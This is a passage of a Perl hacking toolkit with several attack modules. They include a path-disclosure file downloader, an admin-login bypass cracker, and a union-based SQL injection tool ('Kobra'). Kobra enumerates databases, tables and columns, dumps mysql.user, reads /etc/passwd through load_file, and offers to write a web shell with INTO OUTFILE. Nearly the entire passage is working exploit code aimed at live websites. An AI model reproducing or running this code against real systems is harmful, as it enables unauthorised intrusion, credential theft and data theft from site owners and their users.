3149 | $archivo = $2; | |
3150 | } | |
3151 | ||
3152 | printear( "\n[+] Scanning page ...\n", "text", "13", "5" ); | |
3153 | ||
3154 | my $code = toma( $page . $archivo ); | |
3155 | ||
3156 | if ( $code =~ /header\((.*)Content-Disposition: attachment;/ig ) { | |
3157 | ||
3158 | printear( "\n[+] Vulnerable !\n", "text", "13", "5" ); | |
3159 | ||
3160 | my $code = toma( $page . "'" ); | |
3161 | ||
3162 | if ( $code =~ /No such file or directory in <b>(.*)<\/b> on line/ ) | |
3163 | { | |
3164 | ||
3165 | printear( | |
3166 | "\n[+] Full Source Discloure Detect : $1\a\n", "text", | |
3167 | "7", "5" | |
3168 | ); | |
3169 | ||
3170 | } | |
3171 | elsif ( $code =~ | |
3172 | /No existe el fichero o el directorio in <b>(.*)<\/b> on line/ ) | |
3173 | { | |
3174 | printear( | |
3175 | "\n[+] Full Source Discloure Detect : $1\a\n", "text", | |
3176 | "7", "5" | |
3177 | ); | |
3178 | } | |
3179 | else { | |
3180 | printear( | |
3181 | "\n[+] Full Path Dislocure : Not Found\n", "text", | |
3182 | "7", "5" | |
3183 | ); | |
3184 | } | |
3185 | ||
3186 | while (1) { | |
3187 | ||
3188 | my $url = printear( "\n[+] URL : ", "stdin", "11", "13" ); | |
3189 | ||
3190 | if ( $url eq "exit" ) { | |
3191 | adios(); | |
3192 | } | |
3193 | ||
3194 | if ( | |
3195 | download( $page . $url, "logs/fsdlogs/" . basename($url) ) ) | |
3196 | { | |
3197 | printear( "\n[+] File Downloaded\n", "text", "13", "5" ); | |
3198 | ||
3199 | system_leida( "logs/fsdlogs/" . basename($url) ); | |
3200 | ||
3201 | } | |
3202 | ||
3203 | } | |
3204 | ||
3205 | } | |
3206 | else { | |
3207 | printear( "\n[-] Web not vulnerable\n\n", "text", "5", "5" ); | |
3208 | } | |
3209 | ||
3210 | } | |
3211 | ||
3212 | sub head_fsd { | |
3213 | clean(); | |
3214 | printear( " | |
3215 | ||
3216 | ||
3217 | @@@@@ @@@ @@@@ @@@@@ @ @ @@@@@ @ @@@@ @ @@@@@ | |
3218 | @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ | |
3219 | @ @ @ @ @ @ @ @ @ @ @ @ @ @ | |
3220 | @ @ @ @ @ @ @ @ @ @ @ @ @ @ | |
3221 | @@@@ @@@ @ @ @@@@ @ @@@@@ @ @ @ @ @ | |
3222 | @ @ @ @ @ @ @ @ @ @ @ @ @ | |
3223 | @ @ @ @ @ @ @ @ @ @ @ @ @ | |
3224 | @ @ @ @ @ @ @ @ @ @ @ @ @ @ | |
3225 | @ @@@ @@@@ @@@@@ @ @ @ @@@@@ @@@@ @ @ | |
3226 | ||
3227 | ||
3228 | ||
3229 | ||
3230 | ", "logos", "7", "5" ); | |
3231 | } | |
3232 | ||
3233 | sub download { | |
3234 | if ( $nave->mirror( $_[0], $_[1] ) ) { | |
3235 | if ( -f $_[1] ) { | |
3236 | return true; | |
3237 | } | |
3238 | } | |
3239 | } | |
3240 | ||
3241 | sub installer_fsd { | |
3242 | unless ( -d "fsdlogs/" ) { | |
3243 | mkdir( "fsdlogs/", "777" ); | |
3244 | chmod "fsdlogs/", "0777"; | |
3245 | } | |
3246 | } | |
3247 | ||
3248 | } ## | |
3249 | ||
3250 | sub load_bypass { | |
3251 | ||
3252 | head_bypass(); | |
3253 | start_com(); | |
3254 | adios(); | |
3255 | ||
3256 | sub start_com { | |
3257 | my $url = printear( "\n\n[+] Admin : ", "stdin", "11", "13" ); | |
3258 | ||
3259 | if ( $url eq "exit" ) { | |
3260 | estoydentroporahora(); | |
3261 | } | |
3262 | ||
3263 | print "\n[+] Scanning page ...\n"; | |
3264 | ||
3265 | my $code = toma($url); | |
3266 | ||
3267 | my @testar = HTML::Form->parse( $code, "/" ); | |
3268 | ||
3269 | $count = 0; | |
3270 | foreach my $test (@testar) { | |
3271 | $count++; | |
3272 | printear( "\n -- == Form $count == --\n\n", "text", "5", "5" ); | |
3273 | if ( $test->attr(name) eq "" ) { | |
3274 | printear( "[+] Name : No Found" . "\n", "text", "13", "5" ); | |
3275 | } | |
3276 | else { | |
3277 | printear( | |
3278 | "[+] Name : " . $test->attr(name) . "\n", "text", | |
3279 | "13", "5" | |
3280 | ); | |
3281 | } | |
3282 | printear( "[+] Action : " . $test->action . "\n", | |
3283 | "text", "13", "5" ); | |
3284 | printear( "[+] Method : " . $test->method . "\n", | |
3285 | "text", "13", "5" ); | |
3286 | printear( "\n-- == Input == --\n", "text", "5", "5" ); | |
3287 | @inputs = $test->inputs; | |
3288 | ||
3289 | foreach $in (@inputs) { | |
3290 | printear( "\n[+] Type : " . $in->type . "\n", | |
3291 | "text", "13", "5" ); | |
3292 | printear( "[+] Name : " . $in->name . "\n", "text", "13", "5" ); | |
3293 | printear( "[+] Value : " . $in->value . "\n", | |
3294 | "text", "13", "5" ); | |
3295 | } | |
3296 | } | |
3297 | ||
3298 | my $op = printear( "\n[+] Form to crack : ", "stdin", "11", "13" ); | |
3299 | my $aca = printear( "\n[+] Submit Name : ", "stdin", "11", "13" ); | |
3300 | ||
3301 | printear( "\n[+] Options to check\n\n", "text", "5", "5" ); | |
3302 | printear( "[?] 1 - Positive\n", "text", "13", "5" ); | |
3303 | printear( "[?] 2 - Negative\n", "text", "13", "5" ); | |
3304 | printear( "[?] 3 - Automatic\n\n", "text", "13", "5" ); | |
3305 | my $op2 = printear( "[+] Option : ", "stdin", "11", "13" ); | |
3306 | ||
3307 | if ( $op2 eq "1" ) { | |
3308 | my $st = printear( "\n[+] String : ", "stdin", "11", "13" ); | |
3309 | printear( "\n[+] Cracking login....\n", "text", "13", "5" ); | |
3310 | for my $by (@bypass) { | |
3311 | chomp $by; | |
3312 | my $code = load_nownow( $url, $code, $op, $aca, $by ); | |
3313 | if ( $code =~ /$st/ig ) { | |
3314 | cracked( $url, $by ); | |
3315 | } | |
3316 | } | |
3317 | adios(); | |
3318 | } | |
3319 | ||
3320 | if ( $op2 eq "2" ) { | |
3321 | my $st = printear( "\n[+] String : ", "stdin", "11", "13" ); | |
3322 | printear( "\n[+] Cracking login....\n", "text", "13", "5" ); | |
3323 | for my $by (@bypass) { | |
3324 | chomp $by; | |
3325 | my $code = load_nownow( $url, $code, $op, $aca, $by ); | |
3326 | unless ( $code =~ /$st/ig ) { | |
3327 | cracked( $url, $by ); | |
3328 | } | |
3329 | } | |
3330 | adios(); | |
3331 | } | |
3332 | ||
3333 | if ( $op2 eq "3" ) { | |
3334 | printear( "\n[+] Cracking login....\n", "text", "13", "5" ); | |
3335 | my $prueba_falsa = | |
3336 | load_nownow( $url, $code, $op, $aca, "fuck you" ); | |
3337 | for my $by (@bypass) { | |
3338 | chomp $by; | |
3339 | my $code = load_nownow( $url, $code, $op, $aca, $by ); | |
3340 | unless ( $code eq $prueba_falsa ) { | |
3341 | cracked( $url, $by ); | |
3342 | } | |
3343 | } | |
3344 | adios(); | |
3345 | } | |
3346 | } | |
3347 | ||
3348 | sub load_nownow { | |
3349 | ||
3350 | my ( $url, $code, $op, $aca, $text ) = @_; | |
3351 | ||
3352 | $op--; | |
3353 | my @probar = ( HTML::Form->parse( $code, "/" ) )[$op]; | |
3354 | ||
3355 | for my $testa (@probar) { | |
3356 | if ( $testa->method eq "POST" ) { | |
3357 | ||
3358 | my @inputs = $testa->inputs; | |
3359 | for my $in (@inputs) { | |
3360 | if ( $in->type eq "submit" ) { | |
3361 | if ( $in->name eq $aca ) { | |
3362 | push( @botones_names, $in->name ); | |
3363 | push( @botones_values, $in->value ); | |
3364 | } | |
3365 | } | |
3366 | else { | |
3367 | push( @ordenuno, $in->name, $text ); | |
3368 | } | |
3369 | } | |
3370 | ||
3371 | my @preuno = @ordenuno; | |
3372 | push( @preuno, $botones_names[0], $botones_values[0] ); | |
3373 | my $codeuno = $nave->post( $url, \@preuno )->content; | |
3374 | ||
3375 | return $codeuno; | |
3376 | ||
3377 | } | |
3378 | else { | |
3379 | ||
3380 | my $final = ""; | |
3381 | my $orden = ""; | |
3382 | my $partedos = ""; | |
3383 | ||
3384 | my @inputs = $testa->inputs; | |
3385 | for my $testa (@inputs) { | |
3386 | ||
3387 | if ( $testa->name eq $aca ) { | |
3388 | ||
3389 | push( @botones_names, $testa->name ); | |
3390 | push( @botones_values, $testa->value ); | |
3391 | } | |
3392 | else { | |
3393 | $orden .= '' . $testa->name . '=' . $text . '&'; | |
3394 | } | |
3395 | } | |
3396 | chop($orden); | |
3397 | ||
3398 | my $partedos = | |
3399 | "&" . $botones_names[0] . "=" . $botones_values[0]; | |
3400 | my $final = $url . "?" . $orden . $partedos; | |
3401 | ||
3402 | $codedos = toma($final); | |
3403 | return $codedos; | |
3404 | } | |
3405 | } | |
3406 | } | |
3407 | ||
3408 | sub cracked { | |
3409 | printear( "\n\a\a[+] Login Cracked\n\n", "text", "7", "5" ); | |
3410 | printear( "[+] URL : $_[0]\n", "text", "7", "5" ); | |
3411 | printear( "[+] Bypass : $_[1]\n", "text", "7", "5" ); | |
3412 | savefile( "logs-bypass.txt", "[+] URL : $_[0]" ); | |
3413 | savefile( "logs-bypass.txt", "[+] Bypass : $_[1]\n" ); | |
3414 | adios(); | |
3415 | } | |
3416 | ||
3417 | sub head_bypass { | |
3418 | clean(); | |
3419 | printear( " | |
3420 | ||
3421 | @@@@ @@@@@ @ @ @ | |
3422 | @ @ @ @ @ @ | |
3423 | @ @ @ @ @ @ @ | |
3424 | @ @ @ @ @ @ @@@ @@ @@ @ @ @@@@ @@@ @@ @ @ @@ | |
3425 | @@@@ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @@ @ | |
3426 | @ @ @ @ @ @@@@ @ @ @ @ @ @ @ @ @ @ @ @ | |
3427 | @ @ @ @ @ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ | |
3428 | @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ | |
3429 | @@@@ @ @ @@@@ @@ @@ @ @ @@@@ @ @ @ @ @ @ | |
3430 | @ | |
3431 | @@ | |
3432 | ||
3433 | ||
3434 | ||
3435 | ", "logos", "7", "5" ); | |
3436 | } | |
3437 | ||
3438 | } ## | |
3439 | ||
3440 | sub load_kobra { | |
3441 | ||
3442 | installer_kobra(); | |
3443 | clean(); | |
3444 | ||
3445 | &head_kobra; | |
3446 | &menu_kobra; | |
3447 | ||
3448 | adios(); | |
3449 | ||
3450 | sub menu_kobra { | |
3451 | my $page = printear( "[Page] : ", "stdin", "11", "13" ); | |
3452 | my $bypass = | |
3453 | printear( "\n[Bypass : -- /* %20] : ", "stdin", "11", "13" ); | |
3454 | print "\n"; | |
3455 | if ( $page eq "exit" ) { | |
3456 | adios(); | |
3457 | } | |
3458 | &scan_kobra( $page, $bypass ); | |
3459 | } | |
3460 | ||
3461 | sub scan_kobra { | |
3462 | my $page = $_[0]; | |
3463 | printear( "[Status] : Scanning.....\n", "text", "13", "5" ); | |
3464 | ( $pass1, $bypass2 ) = &bypass( $_[1] ); | |
3465 | ||
3466 | my $save = partimealmedio( $_[0] ); | |
3467 | ||
3468 | if ( $_[0] =~ /hackman/ig ) { | |
3469 | savefilear( $save . ".txt", "\n[Target Confirmed] : $_[0]\n" ); | |
3470 | &menu_options( $_[0], $_[1], $save ); | |
3471 | } | |
3472 | ||
3473 | my $testar1 = toma( $page . $pass1 . "and" . $pass1 . "1=0" . $pass2 ); | |
3474 | my $testar2 = toma( $page . $pass1 . "and" . $pass1 . "1=1" . $pass2 ); | |
3475 | ||
3476 | unless ( $testar1 eq $testar2 ) { | |
3477 | motor( $page, $_[1] ); | |
3478 | } | |
3479 | else { | |
3480 | printear( "\n[-] Not vulnerable\n\n", "text", "5", "5" ); | |
3481 | my $op = printear( "[+] Scan anyway y/n : ", "stdin", "11", "13" ); | |
3482 | if ( $op eq "y" ) { | |
3483 | motor( $page, $_[1] ); | |
3484 | } | |
3485 | else { | |
3486 | head_kobra(); | |
3487 | menu_kobra(); | |
3488 | } | |
3489 | } | |
3490 | ||
3491 | } | |
3492 | ||
3493 | sub motor { | |
3494 | ||
3495 | my ( $gen, $save, $control ) = &length( $_[0], $_[1] ); | |
3496 | ||
3497 | if ( $control eq 1 ) { | |
3498 | printear( "[Status] : Enjoy the menu\n\n", "text", "13", "5" ); | |
3499 | &menu_options( $gen, $_[1], $save ); | |
3500 | } | |
3501 | else { | |
3502 | printear( "[Status] : Length columns not found\n\n", | |
3503 | "text", "5", "5" ); | |
3504 | <STDIN>; | |
3505 | &head_kobra; | |
3506 | &menu_kobra; | |
3507 | } | |
3508 | } | |
3509 | ||
3510 | sub head_kobra { | |
3511 | clean(); | |
3512 | printear( " | |
3513 | @ @@ @ | |
3514 | @@ @ @ @@ | |
3515 | @ @@ @ @ @ @ @ @ @@@ | |
3516 | @ @ @ @ @@ @ @@@ @ @ | |
3517 | @@ @ @ @ @ @ @@@ | |
3518 | @ @ @ @ @ @ @ @ @ | |
3519 | @@@ @ @@ @@@ @@@ @@@@@ | |
3520 | ||
3521 | ||
3522 | ||
3523 | ||
3524 | ", "logos", "7", "5" ); | |
3525 | } | |
3526 | ||
3527 | sub length { | |
3528 | printear( | |
3529 | "\n[+] Looking for the number of columns\n\n", "text", | |
3530 | "13", "5" | |
3531 | ); | |
3532 | my $rows = "0"; | |
3533 | my $asc; | |
3534 | my $page = $_[0]; | |
3535 | ( $pass1, $pass2 ) = &bypass( $_[1] ); | |
3536 | ||
3537 | $alert = "char(" . ascii("RATSXPDOWN1RATSXPDOWN") . ")"; | |
3538 | $total = "1"; | |
3539 | for my $rows ( 2 .. 200 ) { | |
3540 | $asc .= "," . "char(" | |
3541 | . ascii( "RATSXPDOWN" . $rows . "RATSXPDOWN" ) . ")"; | |
3542 | $total .= "," . $rows; | |
3543 | $injection = | |
3544 | $page . "1" | |
3545 | . $pass1 . "and" | |
3546 | . $pass1 . "1=0" | |
3547 | . $pass1 . "union" | |
3548 | . $pass1 | |
3549 | . "select" | |
3550 | . $pass1 | |
3551 | . $alert | |
3552 | . $asc; | |
3553 | $test = toma($injection); | |
3554 | if ( $test =~ /RATSXPDOWN/ ) { | |
3555 | @number = $test =~ m{RATSXPDOWN(\d+)RATSXPDOWN}g; | |
3556 | $control = 1; | |
3557 | ||
3558 | my $save = partimealmedio( $_[0] ); | |
3559 | ||
3560 | savefilear( $save . ".txt", "\n[Target confirmed] : $page" ); | |
3561 | savefilear( $save . ".txt", "[Bypass] : $_[1]\n" ); | |
3562 | savefilear( $save . ".txt", | |
3563 | "[Limit] : The site has $rows columns" ); | |
3564 | savefilear( $save . ".txt", | |
3565 | "[Data] : The number @number print data" ); | |
3566 | $total =~ s/$number[0]/hackman/; | |
3567 | savefilear( | |
3568 | $save . ".txt", | |
3569 | "[SQLI] : " | |
3570 | . $page . "1" | |
3571 | . $pass1 . "and" | |
3572 | . $pass1 . "1=0" | |
3573 | . $pass1 . "union" | |
3574 | . $pass1 | |
3575 | . "select" | |
3576 | . $pass1 | |
3577 | . $total | |
3578 | ); | |
3579 | return ( | |
3580 | $page . "1" | |
3581 | . $pass1 . "and" | |
3582 | . $pass1 . "1=0" | |
3583 | . $pass1 . "union" | |
3584 | . $pass1 | |
3585 | . "select" | |
3586 | . $pass1 | |
3587 | . $total, | |
3588 | $save, $control | |
3589 | ); | |
3590 | } | |
3591 | } | |
3592 | } | |
3593 | ||
3594 | sub details { | |
3595 | my ( $page, $bypass, $save ) = @_; | |
3596 | ( $pass1, $pass2 ) = &bypass($bypass); | |
3597 | savefilear( $save . ".txt", "\n" ); | |
3598 | if ( $page =~ /(.*)hackman(.*)/ig ) { | |
3599 | printear( "[+] Searching information..\n\n", "text", "13", "5" ); | |
3600 | my ( $start, $end ) = ( $1, $2 ); | |
3601 | $inforschema = | |
3602 | $start | |
3603 | . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))" | |
3604 | . $end | |
3605 | . $pass1 . "from" | |
3606 | . $pass1 | |
3607 | . "information_schema.tables" | |
3608 | . $pass2; | |
3609 | $mysqluser = | |
3610 | $start | |
3611 | . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))" | |
3612 | . $end | |
3613 | . $pass1 . "from" | |
3614 | . $pass1 | |
3615 | . "mysql.user" | |
3616 | . $pass2; | |
3617 | $test3 = | |
3618 | toma( $start | |
3619 | . "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))" | |
3620 | . $end | |
3621 | . $pass2 ); | |
3622 | $test1 = toma($inforschema); | |
3623 | $test2 = toma($mysqluser); | |
3624 | if ( $test2 =~ /ERTOR854/ig ) { | |
3625 | savefilear( $save . ".txt", "[mysql.user] : ON" ); | |
3626 | printear( "[mysql.user] : ON\n", "text", "7", "5" ); | |
3627 | } | |
3628 | else { | |
3629 | printear( "[mysql.user] : OFF\n", "text", "5", "5" ); | |
3630 | savefilear( $save . ".txt", "[mysql.user] : OFF" ); | |
3631 | } | |
3632 | if ( $test1 =~ /ERTOR854/ig ) { | |
3633 | printear( "[information_schema.tables] : ON\n", | |
3634 | "text", "7", "5" ); | |
3635 | savefilear( $save . ".txt", | |
3636 | "[information_schema.tables] : ON" ); | |
3637 | } | |
3638 | else { | |
3639 | printear( "[information_schema.tables] : OFF\n", | |
3640 | "text", "5", "5" ); | |
3641 | savefilear( $save . ".txt", | |
3642 | "[information_schema.tables] : OFF" ); | |
3643 | } | |
3644 | if ( $test3 =~ /ERTOR854/ig ) { | |
3645 | printear( "[load_file] : ON\n", "text", "7", "5" ); | |
3646 | savefilear( | |
3647 | $save . ".txt", | |
3648 | "[load_file] : " | |
3649 | . $start | |
3650 | . "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))" | |
3651 | . $end | |
3652 | . $pass2 | |
3653 | ); | |
3654 | } | |
3655 | $concat = | |
3656 | "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))"; | |
3657 | $injection = $start . $concat . $end . $pass2; | |
3658 | $code = toma($injection); | |
3659 | if ( $code =~ /ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g ) { | |
3660 | printear( | |
3661 | "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] Username : $3\n\n", | |
3662 | "text", "7", "5" | |
3663 | ); | |
3664 | savefilear( | |
3665 | $save . ".txt", | |
3666 | "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] Username : $3\n" | |
3667 | ); | |
3668 | } | |
3669 | else { | |
3670 | printear( "\n[-] Not found any data\n", "text", "5", "5" ); | |
3671 | } | |
3672 | } | |
3673 | } | |
3674 | ||
3675 | sub menu_options { | |
3676 | ||
3677 | my $testarnownow = $_[0]; ## Comment on this line to compile to exe | |
3678 | $SIG{INT} = | |
3679 | sub { reload($testarnownow) }; ## Comment on this line to compile to exe | |
3680 | ||
3681 | head_kobra(); | |
3682 | ||
3683 | printear( "[Target confirmed] : $_[0]\n", "text", "11", "5" ); | |
3684 | printear( "[Bypass] : $_[1]\n\n", "text", "11", "5" ); | |
3685 | ||
3686 | my $save = partimealmedio( $_[0] ); | |
3687 | ||
3688 | printear( "[save] : /logs/webs/$save\n\n", "text", "11", "5" ); | |
3689 | ||
3690 | printear( "\n--== information_schema.tables ==--\n\n", | |
3691 | "logos", "5", "5" ); | |
3692 | printear( "[1] : Show tables\n", "logos", "13", "5" ); | |
3693 | printear( "[2] : Show columns\n", "logos", "13", "5" ); | |
3694 | printear( "[3] : Show DBS\n", "logos", "13", "5" ); | |
3695 | printear( "[4] : Show tables with other DB\n", "logos", "13", "5" ); | |
3696 | printear( "[5] : Show columns with other DB", "logos", "13", "5" ); | |
3697 | printear( "\n\n--== mysql.user ==--\n\n", "logos", "5", "5" ); | |
3698 | printear( "[6] : Show users\n", "logos", "13", "5" ); | |
3699 | printear( "\n--== Others ==--\n\n", "logos", "5", "5" ); | |
3700 | printear( "[7] : Fuzz tables\n", "logos", "13", "5" ); | |
3701 | printear( "[8] : Fuzz Columns\n", "logos", "13", "5" ); | |
3702 | printear( "[9] : Fuzzing files with load_file\n", "logos", "13", "5" ); | |
3703 | printear( "[10] : Read a file with load_file\n", "logos", "13", "5" ); | |
3704 | printear( "[11] : Dump\n", "logos", "13", "5" ); | |
3705 | printear( "[12] : Informacion of the server\n", "logos", "13", "5" ); | |
3706 | printear( "[13] : Create a shell with into outfile\n", | |
3707 | "logos", "13", "5" ); | |
3708 | printear( "[14] : Show Log\n", "logos", "13", "5" ); | |
3709 | printear( "[15] : Change Target\n", "logos", "13", "5" ); | |
3710 | printear( "[16] : Exit\n", "logos", "13", "5" ); | |
3711 | ||
3712 | my $opcion = printear( "\n[Option] : ", "stdin", "11", "13" ); | |
3713 | ||
3714 | if ( $opcion eq "1" ) { | |
3715 | schematables( $_[0], $_[1], $save ); | |
3716 | &reload; | |
3717 | } | |
3718 | elsif ( $opcion eq "2" ) { | |
3719 | my $tabla = printear( "\n[Table] : ", "stdin", "11", "13" ); | |
3720 | schemacolumns( $_[0], $_[1], $save, $tabla ); | |
3721 | &reload; | |
3722 | } | |
3723 | elsif ( $opcion eq "3" ) { | |
3724 | &schemadb( $_[0], $_[1], $save ); | |
3725 | &reload; | |
3726 | } | |
3727 | elsif ( $opcion eq "4" ) { | |
3728 | my $data = printear( "\n[Database] : ", "stdin", "11", "13" ); | |
3729 | &schematablesdb( $_[0], $_[1], $data, $save ); | |
3730 | &reload; | |
3731 | } | |
3732 | elsif ( $opcion eq "5" ) { | |
3733 | my $db = printear( "\n[DB] : ", "stdin", "11", "13" ); | |
3734 | my $table = printear( "\n[Table] : ", "stdin", "11", "13" ); | |
3735 | &schemacolumnsdb( $_[0], $_[1], $db, $table, $save ); | |
3736 | &reload; | |
3737 | } | |
3738 | elsif ( $opcion eq "6" ) { | |
3739 | &mysqluser( $_[0], $_[1], $save ); | |
3740 | &reload; | |
3741 | } | |
3742 | elsif ( $opcion eq "7" ) { ## | |
3743 | &fuzz( $_[0], $_[1], $save ); | |
3744 | &reload; | |
3745 | } | |
3746 | elsif ( $opcion eq "8" ) { ## | |
3747 | my $table = printear( "\n[Table] : ", "stdin", "11", "13" ); | |
3748 | &fuzzcol( $_[0], $_[1], $table, $save ); | |
3749 | &reload; | |
3750 | } | |
3751 | elsif ( $opcion eq "9" ) { | |
3752 | &load( $_[0], $_[1], $save ); | |
3753 | &reload; | |
3754 | } | |
3755 | elsif ( $opcion eq "10" ) { | |
3756 | &loadfile( $_[0], $_[1], $save ); | |
3757 | &reload; | |
3758 | } | |
3759 | elsif ( $opcion eq "11" ) { | |
3760 | my $tabla = printear( "\n[Table to dump] : ", "stdin", "11", "13" ); | |
3761 | my $col1 = printear( "\n[Column 1] : ", "stdin", "11", "13" ); | |
3762 | my $col2 = printear( "\n[Column 2] : ", "stdin", "11", "13" ); | |
3763 | print "\n\n"; | |
3764 | &dump( $_[0], $col1, $col2, $tabla, $_[1], $save ); | |
3765 | &reload; | |
3766 | } | |
3767 | elsif ( $opcion eq "12" ) { | |
3768 | print "\n"; | |
3769 | &details( $_[0], $_[1], $save ); | |
3770 | &reload; | |
3771 | } | |
3772 | elsif ( $opcion eq "13" ) { | |
3773 | my $path = | |
3774 | printear( "\n[Full Path Discloure] : ", "stdin", "11", "13" ); | |
3775 | &into( $_[0], $_[1], $path, $save ); | |
3776 | &reload; | |
3777 | } | |
3778 | elsif ( $opcion eq "14" ) { | |
3779 | $t = "logs/webs/$save.txt"; | |
3780 | system_leida($t); | |
3781 | &reload; | |
3782 | } | |
3783 | elsif ( $opcion eq "15" ) { | |
3784 | &head_kobra; | |
3785 | &menu_kobra; | |
3786 | } | |
3787 | ||
3788 | elsif ( $opcion eq "16" ) { | |
3789 | adios(); | |
3790 | } | |
3791 | else { | |
3792 | &reload; | |
3793 | } | |
3794 | } | |
3795 | ||
3796 | sub schematables { | |
3797 | ||
3798 | $real = "1"; | |
3799 | my ( $page, $bypass, $save ) = @_; | |
3800 | savefilear( $save . ".txt", "\n" ); | |
3801 | ||
3802 | my $page1 = $page; | |
3803 | ( $pass1, $pass2 ) = &bypass( $_[1] ); | |
3804 | savefilear( $save . ".txt", "[DB] : Default" ); | |
3805 | printear( "\n[+] Searching tables with schema\n\n", "text", "13", "5" ); | |
3806 | $page =~ | |
3807 | s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/; | |
3808 | $page1 =~ | |
3809 | s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/; | |
3810 | $code = | |
3811 | toma( $page1 | |
3812 | . $pass1 . "from" | |
3813 | . $pass1 | |
3814 | . "information_schema.tables" | |
3815 | . $pass2 ); | |
3816 | ||
3817 | if ( $code =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) { | |
3818 | my $resto = $1; | |
3819 | $total = $resto - 17; | |
3820 | printear( "[+] Tables Length : $total\n\n", "text", "13", "5" ); | |
3821 | savefilear( $save . ".txt", "[+] Searching tables with schema\n" ); | |
3822 | savefilear( $save . ".txt", "[+] Tables Length : $total\n" ); | |
3823 | my $limit = $1; | |
3824 | for my $limit ( 17 .. $limit ) { | |
3825 | $code1 = | |
3826 | toma( $page | |
3827 | . $pass1 . "from" | |
3828 | . $pass1 | |
3829 | . "information_schema.tables" | |
3830 | . $pass1 . "limit" | |
3831 | . $pass1 | |
3832 | . $limit . ",1" | |
3833 | . $pass2 ); | |
3834 | ||
3835 | #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2."\n"; | |
3836 | if ( $code1 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) { | |
3837 | my $table = $1; | |
3838 | chomp $table; | |
3839 | printear( "[Table $real Found : $table ]\n", | |
3840 | "text", "7", "5" ); | |
3841 | savefilear( $save . ".txt", | |
3842 | "[Table $real Found : $table ]" ); | |
3843 | $real++; | |
3844 | } | |
3845 | } | |
3846 | } | |
3847 | else { | |
3848 | printear( "\n[-] information_schema = ERROR\n", "text", "5", "5" ); | |
3849 | } | |
3850 | } | |
3851 | ||
3852 | sub reload { | |
3853 | printear( "\n[+] Press the enter key to return to main menu\n", | |
3854 | "text", "11", "5" ); | |
3855 | <STDIN>; | |
3856 | &head_kobra; | |
3857 | &menu_options; | |
3858 | } | |
3859 | ||
3860 | sub schemacolumns { | |
3861 | my ( $page, $bypass, $save, $table ) = @_; | |
3862 | my $page3 = $page; | |
3863 | my $page4 = $page; | |
3864 | savefilear( $save . ".txt", "\n" ); | |
3865 | ( $pass1, $pass2 ) = &bypass($bypass); | |
3866 | printear( "\n[DB] : Default\n", "text", "13", "5" ); | |
3867 | savefilear( $save . ".txt", "[DB] : Default" ); | |
3868 | savefilear( $save . ".txt", "[Table] : $table\n" ); | |
3869 | $page3 =~ | |
3870 | s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/; | |
3871 | $code3 = | |
3872 | toma( $page3 | |
3873 | . $pass1 . "from" | |
3874 | . $pass1 | |
3875 | . "information_schema.columns" | |
3876 | . $pass1 . "where" | |
3877 | . $pass1 | |
3878 | . "table_name=char(" | |
3879 | . ascii($table) . ")" | |
3880 | . $pass2 ); | |
3881 | ||
3882 | if ( $code3 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) { | |
3883 | printear( "\n[Columns Length : $1 ]\n\n", "text", "13", "5" ); | |
3884 | savefilear( $save . ".txt", "[Columns Length : $1 ]\n" ); | |
3885 | my $si = $1; | |
3886 | chomp $si; | |
3887 | $page4 =~ | |
3888 | s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/; | |
3889 | $real = "1"; | |
3890 | for my $limit2 ( 0 .. $si ) { | |
3891 | $code4 = | |
3892 | toma( $page4 | |
3893 | . $pass1 . "from" | |
3894 | . $pass1 | |
3895 | . "information_schema.columns" | |
3896 | . $pass1 . "where" | |
3897 | . $pass1 | |
3898 | . "table_name=char(" | |
3899 | . ascii($table) . ")" | |
3900 | . $pass1 . "limit" | |
3901 | . $pass1 | |
3902 | . $limit2 . ",1" | |
3903 | . $pass2 ); | |
3904 | if ( $code4 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) { | |
3905 | printear( "[Column $real] : $1\n", "text", "7", "5" ); | |
3906 | savefilear( $save . ".txt", "[Column $real] : $1" ); | |
3907 | $real++; | |
3908 | } | |
3909 | } | |
3910 | } | |
3911 | else { | |
3912 | printear( "\n[-] information_schema = ERROR\n", "text", "5", "5" ); | |
3913 | } | |
3914 | } | |
3915 | ||
3916 | sub schemadb { | |
3917 | my ( $page, $bypass, $save ) = @_; | |
3918 | my $page1 = $page; | |
3919 | savefilear( $save . ".txt", "\n" ); | |
3920 | printear( "\n[+] Searching DBS\n\n", "text", "13", "5" ); | |
3921 | ( $pass1, $pass2 ) = &bypass($bypass); | |
3922 | $page =~ | |
3923 | s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/; | |
3924 | $code = toma( | |
3925 | $page . $pass1 . "from" . $pass1 . "information_schema.schemata" ); | |
3926 | if ( $code =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) { | |
3927 | my $limita = $1; | |
3928 | printear( "[+] Databases Length : $limita\n\n", "text", "13", "5" ); | |
